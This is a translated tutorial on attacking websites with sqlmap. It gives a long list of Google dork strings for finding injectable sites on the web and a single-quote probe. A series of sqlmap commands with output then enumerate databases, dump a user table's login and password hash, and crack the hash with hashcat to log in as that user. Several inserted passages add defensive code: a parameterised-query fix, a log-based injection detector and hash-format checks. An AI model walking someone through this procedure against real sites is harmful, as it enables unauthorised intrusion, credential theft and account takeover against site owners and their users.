SQL injection attacks on websites and databases using Sqlmap


Translated from: http://www.blackmoreops.com/2014/05/07/use-sqlmap-sql-injection-hack-website-database/

0x00 Background Introduction

1. What is SQL injection?

SQL injection is a code injection technique used to attack data-driven applications: malicious SQL is injected into specific input fields, for example to dump the database. A successful SQL injection is always the result of a security flaw in the application, such as user input that is not properly filtered (for certain strings) or whose type is not enforced, which lets the SQL statement execute in unintended ways. SQL injection is the most common attack technique in website penetration, and it can be used against any SQL database. In this guide I will show how to use sqlmap on Kali Linux to penetrate a website (more precisely, its database) and extract user name and password information.

2. What is Sqlmap?

sqlmap is an open-source penetration testing tool mainly used to automate the detection and exploitation of SQL injection flaws and to take over database servers. sqlmap comes with a powerful detection engine aimed at experienced penetration testers: it can not only fingerprint the different databases, but also extract data from them, access the underlying file system and execute system commands through out-of-band connections.

The official website http://www.sqlmap.org gives a more detailed introduction to sqlmap and its many features. Most notably, sqlmap fully supports detecting and exploiting injection in MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access and other databases, and it can use six different injection techniques.

It is also important to note, before you attack, that a site's creators or maintainers spend a lot of time and effort on it and may depend on it for their livelihood. Your actions may affect others in ways you never intended. I think I have made this clear enough. (PS: attack carefully, and do not do anything illegal.)

PS: I had previously read some articles about sqlmap on WooYun and benefited from them. Today I translated this article to provide a basic framework for using sqlmap; for the principles of SQL injection, sqlmap's detailed command-line parameters and different worked examples, refer to the following articles:

SQL injection principle: HTTP://DROPS.WOOYUN.ORG/PAPERS/59

Sqlmap User manual: http://drops.wooyun.org/tips/143

Sqlmap instance cookbook:http://drops.wooyun.org/tips/1343

0x01 Locating an injectable site

This is usually the most tedious and time-consuming step. If you already know how to use Google dorks (Google dork SQL injection: a beginner-friendly way of finding injection points with Google search strings) you may already have some ideas; if you have not collected such search strings, you can copy the entries below into Google and wait for its results.

A: Use Google dork strings to find websites that can be injected

This list is very long; if you also know SQL you can add new entries yourself. Remember to leave me a message.

Google dork strings, in three columns:
Inurl:item_id= Inurl:review.php?id= Inurl:hosting_info.php?id=
Inurl:newsid= inurl:iniziativa.php?in= Inurl:gallery.php?id=
Inurl:trainers.php?id= Inurl:curriculum.php?id= Inurl:rub.php?idr=
Inurl:news-full.php?id= Inurl:labels.php?id= Inurl:view_faq.php?id=
Inurl:news_display.php?getid= Inurl:story.php?id= Inurl:artikelinfo.php?id=
inurl:index2.php?option= Inurl:look.php?id= Inurl:detail.php?id=
Inurl:readnews.php?id= Inurl:newsone.php?id= inurl:index.php?=
inurl:top10.php?cat= Inurl:aboutbook.php?id= Inurl:profile_view.php?id=
Inurl:newsone.php?id= Inurl:material.php?id= Inurl:category.php?id=
Inurl:event.php?id= Inurl:opinions.php?id= Inurl:publications.php?id=
Inurl:product-item.php?id= Inurl:announce.php?id= Inurl:fellows.php?id=
Inurl:sql.php?id= Inurl:rub.php?idr= Inurl:downloads_info.php?id=
Inurl:index.php?catid= Inurl:galeri_info.php?l= Inurl:prod_info.php?id=
Inurl:news.php?catid= inurl:tekst.php?idt= Inurl:shop.php?do=part&id=
Inurl:index.php?id= Inurl:newscat.php?id= Inurl:productinfo.php?id=
Inurl:news.php?id= inurl:newsticker_info.php?idn= Inurl:collectionitem.php?id=
Inurl:index.php?id= Inurl:rubrika.php?idr= Inurl:band_info.php?id=
Inurl:trainers.php?id= Inurl:rubp.php?idr= Inurl:product.php?id=
inurl:buy.php?category= inurl:offer.php?idf= Inurl:releases.php?id=
Inurl:article.php?id= inurl:art.php?idm= Inurl:ray.php?id=
Inurl:play_old.php?id= Inurl:title.php?id= Inurl:produit.php?id=
Inurl:declaration_more.php?decl_id= Inurl:news_view.php?id= Inurl:pop.php?id=
Inurl:pageid= Inurl:select_biblio.php?id= Inurl:shopping.php?id=
Inurl:games.php?id= Inurl:humor.php?id= Inurl:productdetail.php?id=
inurl:page.php?file= Inurl:aboutbook.php?id= Inurl:post.php?id=
Inurl:newsdetail.php?id= Inurl:ogl_inet.php?ogl_id= Inurl:viewshowdetail.php?id=
Inurl:gallery.php?id= Inurl:fiche_spectacle.php?id= Inurl:clubpage.php?id=
Inurl:article.php?id= Inurl:communique_detail.php?id= Inurl:memberinfo.php?id=
Inurl:show.php?id= Inurl:sem.php3?id= Inurl:section.php?id=
Inurl:staff_id= Inurl:kategorie.php4?id= Inurl:theme.php?id=
inurl:newsitem.php?num= Inurl:news.php?id= Inurl:page.php?id=
Inurl:readnews.php?id= Inurl:index.php?id= Inurl:shredder-categories.php?id=
inurl:top10.php?cat= Inurl:faq2.php?id= Inurl:tradecategory.php?id=
inurl:historialeer.php?num= Inurl:show_an.php?id= Inurl:product_ranges_view.php?id=
inurl:reagir.php?num= Inurl:preview.php?id= Inurl:shop_category.php?id=
inurl:stray-questions-view.php?num= Inurl:loadpsb.php?id= Inurl:transcript.php?id=
inurl:forum_bds.php?num= Inurl:opinions.php?id= Inurl:channel_id=
Inurl:game.php?id= Inurl:spr.php?id= Inurl:aboutbook.php?id=
Inurl:view_product.php?id= Inurl:pages.php?id= Inurl:preview.php?id=
Inurl:newsone.php?id= Inurl:announce.php?id= Inurl:loadpsb.php?id=
Inurl:sw_comment.php?id= Inurl:clanek.php4?id= Inurl:pages.php?id=
Inurl:news.php?id= Inurl:participant.php?id=
Inurl:avd_start.php?avd= Inurl:download.php?id=
Inurl:event.php?id= Inurl:main.php?id=
Inurl:product-item.php?id= Inurl:review.php?id=
Inurl:sql.php?id= Inurl:chappies.php?id=
Inurl:material.php?id= Inurl:read.php?id=
Inurl:clanek.php4?id= Inurl:prod_detail.php?id=
Inurl:announce.php?id= Inurl:viewphoto.php?id=
Inurl:chappies.php?id= Inurl:article.php?id=
Inurl:read.php?id= Inurl:person.php?id=
Inurl:viewapp.php?id= Inurl:productinfo.php?id=
Inurl:viewphoto.php?id= Inurl:showimg.php?id=
Inurl:rub.php?idr= Inurl:view.php?id=
Inurl:galeri_info.php?l= Inurl:website.php?id=

B: Initial check of whether the website can be SQL-injected

After searching for the strings above you may get hundreds or thousands of results, so how do you tell whether these sites can be injected with sqlmap? There are many ways, and I'm sure you will argue about which is best, but for me the following is the simplest and most effective.

Let's say you used the string inurl:item_id= and one of the results is:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15

After appending a single quotation mark, the URL becomes:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'

If the page returns a SQL error, there is an injection point on the page; if the page loads normally or redirects to a different page, skip the site and test the next one the same way!

PS: Nowadays probes such as ' and 1=1, ' or 1=1 and similar are more commonly used to test for injection points; this article focuses on the approach and overall steps of injecting with sqlmap.
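The single-quote and ' or 1=1 probes above only work because the parameter is pasted into the SQL statement. As an added example (not from the original article), the two handlers below, written against an in-memory SQLite table standing in for the item.cgi?item_id= lookup, show the vulnerable concatenation beside the parameterised fix; the table rows and probe values are constructed.

```python
import sqlite3

# Constructed sample rows standing in for the item table behind item.cgi?item_id=
ROWS = [(15, "lamp"), (16, "chair"), (17, "table")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE item (item_id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO item VALUES (?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, item_id):
    # The raw parameter becomes part of the statement text: a stray quote breaks
    # the syntax (the error pages shown in this article) and ' OR '1'='1 rewrites
    # the WHERE clause so that every row is returned.
    sql = "SELECT item_id, name FROM item WHERE item_id = '%s'" % item_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, item_id):
    # Bound parameter: the driver passes the value separately from the SQL, so
    # it can never be parsed as SQL. A hostile value simply matches nothing.
    # (Validating that item_id is an integer before the query is a second layer.)
    return conn.execute(
        "SELECT item_id, name FROM item WHERE item_id = ?", (item_id,)
    ).fetchall()


def probe(conn, lookup, value):
    """Send one test value and report the observable result: 'rows:N' or
    'error:<type>', the same signal the article reads from the browser."""
    try:
        return "rows:%d" % len(lookup(conn, value))
    except sqlite3.Error as exc:
        return "error:%s" % type(exc).__name__


if __name__ == "__main__":
    db = make_db()
    for value in ("15", "15'", "15' OR '1'='1"):
        print("%-16r vulnerable=%-22s safe=%s" % (
            value, probe(db, lookup_vulnerable, value), probe(db, lookup_safe, value)))
```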

Here is the SQL error from my own test:

The SQL errors returned by different databases may differ, for example:

Microsoft SQL Server

Server Error in '/' Application. Unclosed quotation mark before the character string 'attack;'.

Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string 'attack;'

MySQL Errors

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 12

Oracle Errors

java.sql.SQLException: ORA-00933: SQL command not properly ended
    at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:180)
    at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLException java.sql.SQLException: ORA-01756: quoted string not properly terminated

PostgreSQL Errors

Query failed: ERROR: unterminated quoted string at or near "'"

0x02 Listing the DBMS databases

As you can see, I found a website with a SQL injection point. Now I need to list all the databases (this step is sometimes called enumeration). Because I use sqlmap, it will tell me which vulnerabilities exist.

Run the following command, where the URL is the one on which you found the injection point:

sqlmap -u "http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15" --dbs

We now see two databases. INFORMATION_SCHEMA is the standard default database in almost all MySQL installations, so our interest is mainly in the sqldummywebsite database.

Here are the parameters:

sqlmap: the name of the executable; you can also run python sqlmap.py instead
-u: the target URL
--dbs: enumerate the DBMS databases

0x03 List the tables of the target database

Now we need to know which tables are in the database sqldummywebsite. To get this information, we use the following command:

sqlmap -u "http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15" -D sqldummywebsite --tables

We found that this database has 8 tables:

[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'iso-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info

Obviously, our interest is mainly in the table user_info, because it contains the database's user names and passwords.

0x04 List the columns in the specified database

Now we need to list all the columns in the table user_info of the database sqldummywebsite. Doing this with sqlmap is very simple; run the following command:

sqlmap -u "http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15" -D sqldummywebsite -T user_info --columns

The command returns 5 entries:

[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'iso-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)

Ha ha! The user_login and user_password fields are the ones we're looking for!

0x05 List user names from the table in the specified database

SQL injection with sqlmap is very simple! Run the following command again:

sqlmap -u "http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15" -D sqldummywebsite -T user_info -C user_login --dump

Now we have the user name from the database:

[10:58:39] [INFO] retrieved: userx
[10:58:40] [INFO] analyzing table dump for possible password hashes

Now we only need the user's password; the following explains how to get it!

0x06 Extract User Password

You may already be getting used to sqlmap! Use the following parameters to extract the value of the password field:

sqlmap -u "http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15" -D sqldummywebsite -T user_info -C user_password --dump

Now we get the password field:

[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iybc17xk0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iybc17xk0e. |
+---------------+
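Each of the enumeration and dump steps above sends many requests carrying injection payloads against the same parameter, which is exactly what a web server log shows on the defending side. As an added example (not from the original article), the detector below parses combined-format access log lines, flags quote and SQL-keyword payloads, the sqlmap User-Agent and 500 responses, and aggregates hits per client; the log lines are constructed to mirror the item.cgi?item_id= target used here, and the keyword list and threshold are my own choices.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Combined log format: client IP, timestamp, request line, status, size, referer, user agent
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Tokens that have no business in an id-style query parameter (heuristic, assumed list)
INJECT_RE = re.compile(r"""('|--|/\*|\b(or|and|union|select|sleep|benchmark)\b)""", re.I)


def classify(line):
    """Return the reasons a log line looks like injection probing, or [] if clean."""
    m = LOG_RE.match(line)
    if not m:
        return []
    reasons = []
    if "sqlmap" in m.group("ua").lower():
        reasons.append("sqlmap user-agent")
    # Decode %27 etc. first, otherwise the quote probe from the article is missed
    query = unquote_plus(urlsplit(m.group("path")).query)
    if INJECT_RE.search(query):
        reasons.append("sql metacharacters in query string")
    if m.group("status") == "500":
        reasons.append("server error response")
    return reasons


def suspicious_sources(lines, threshold=3):
    """Count flagged requests per client IP and return those at or above threshold."""
    hits = defaultdict(int)
    for line in lines:
        if classify(line):
            hits[LOG_RE.match(line).group("ip")] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}


# Constructed sample log lines (addresses from the documentation ranges)
SAMPLE = [
    '203.0.113.5 - - [07/May/2014:10:56:20 +0000] "GET /cgi-bin/item.cgi?item_id=15%27 HTTP/1.1" 500 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [07/May/2014:10:56:22 +0000] "GET /cgi-bin/item.cgi?item_id=15%20AND%201%3D1 HTTP/1.1" 200 2048 "-" "sqlmap/1.0-dev"',
    '203.0.113.5 - - [07/May/2014:10:56:25 +0000] "GET /cgi-bin/item.cgi?item_id=15%20UNION%20SELECT%20NULL HTTP/1.1" 200 2048 "-" "sqlmap/1.0-dev"',
    '198.51.100.9 - - [07/May/2014:10:57:01 +0000] "GET /cgi-bin/item.cgi?item_id=16 HTTP/1.1" 200 1930 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(classify(line))
    print(suspicious_sources(SAMPLE))
```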

Although we got the value of the password field, it is the hash of the password, so now we need to crack it. I've previously explored how to crack MD5, phpBB, MySQL and SHA-1 hashes on Kali Linux.

You can refer to:

http://www.blackmoreops.com/2014/03/26/cracking-md5-phpbb-mysql-and-sha1-passwords-with-hashcat/

Here's a brief description of how to use hashcat to crack MD5.

0x07 Crack the password

Now that we have the value of the password field, 24iybc17xk0e, we should first determine the hash type.

A: Identify the hash type

Fortunately, Kali Linux provides a tool for identifying hash types; just type the following command:

hash-identifier

Then provide the hash value at the prompt:

So this is a DES(Unix) hash.

PS: Password hashes actually come in several forms, such as the *nix formats, MD5(Unix) and so on; for details refer to the hash type portal: http://zone.wooyun.org/content/2471
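Identifying the format is the step that decides how much a dumped hash is worth to an attacker, and on the defending side it is the same check used to find legacy hashes that need re-hashing. As an added example (not from the original article), the classifier below applies length and alphabet heuristics of my own, in the spirit of hash-identifier, recognises the 13-character DES(Unix) form of the dumped value, and shows one stdlib upgrade path (PBKDF2-HMAC-SHA256, assumed parameters) for storing passwords instead; the other sample hashes are constructed.

```python
import hashlib
import hmac
import os
import re

# (name, pattern over the whole string); order matters: the '$'-prefixed modular
# crypt forms are tested before the bare raw-hex and crypt-alphabet forms.
FORMATS = [
    ("bcrypt", re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$")),
    ("SHA-512(Unix) crypt", re.compile(r"^\$6\$[^$]{1,16}\$[./A-Za-z0-9]{86}$")),
    ("MD5(Unix) crypt", re.compile(r"^\$1\$[^$]{1,8}\$[./A-Za-z0-9]{22}$")),
    ("MySQL 4.1+ (SHA-1 twice)", re.compile(r"^\*[0-9A-Fa-f]{40}$")),
    ("MD5 (raw hex)", re.compile(r"^[0-9A-Fa-f]{32}$")),
    ("SHA-1 (raw hex)", re.compile(r"^[0-9A-Fa-f]{40}$")),
    # 2-char salt + 11-char digest from the crypt alphabet: the classic DES(Unix) form,
    # which keeps only the first 8 password characters and uses a 12-bit salt
    ("DES(Unix) crypt", re.compile(r"^[./A-Za-z0-9]{13}$")),
]
# Formats too cheap to brute-force for stored passwords today (assumed policy)
LEGACY = {"DES(Unix) crypt", "MD5(Unix) crypt", "MySQL 4.1+ (SHA-1 twice)",
          "MD5 (raw hex)", "SHA-1 (raw hex)"}


def identify(h):
    h = h.strip()
    for name, rx in FORMATS:
        if rx.match(h):
            return name
    return "unknown"


def needs_migration(h):
    return identify(h) in LEGACY


ITERATIONS = 600_000  # assumed work factor; re-hash legacy entries at the next login


def pbkdf2_store(password, salt=None):
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "$pbkdf2-sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), dk.hex())


def pbkdf2_verify(password, stored):
    _, _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)
```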

B: Use cudaHashcat to crack the hash

First we must find the mode number hashcat uses for DES hashes; run the command:

cudahashcat --help | grep DES

PS: cudaHashcat is the GPU-based version of the cracking tool, and the oclHashcat mentioned below is the same tool for AMD cards; for a detailed introduction and usage see the hashcat portal: http://drops.wooyun.org/tools/655

The mode number is either 1500 or 3100; because the target is a MySQL database, it must be 1500. I'm running a computer with an Nvidia graphics card, so I can use cudaHashcat; my laptop has AMD graphics, so there I can only use oclHashcat to crack MD5. If you run inside VirtualBox or VMware you can use neither cudaHashcat nor oclHashcat; you must install Kali Linux directly, not in a virtual machine.

I store the hash value in the file des.hash and then run the command:

cudahashcat -m 1500 -a 0 /root/sql/des.hash /root/sql/rockyou.txt

Now we have the cracked password: abc123, and we can log in as this user.
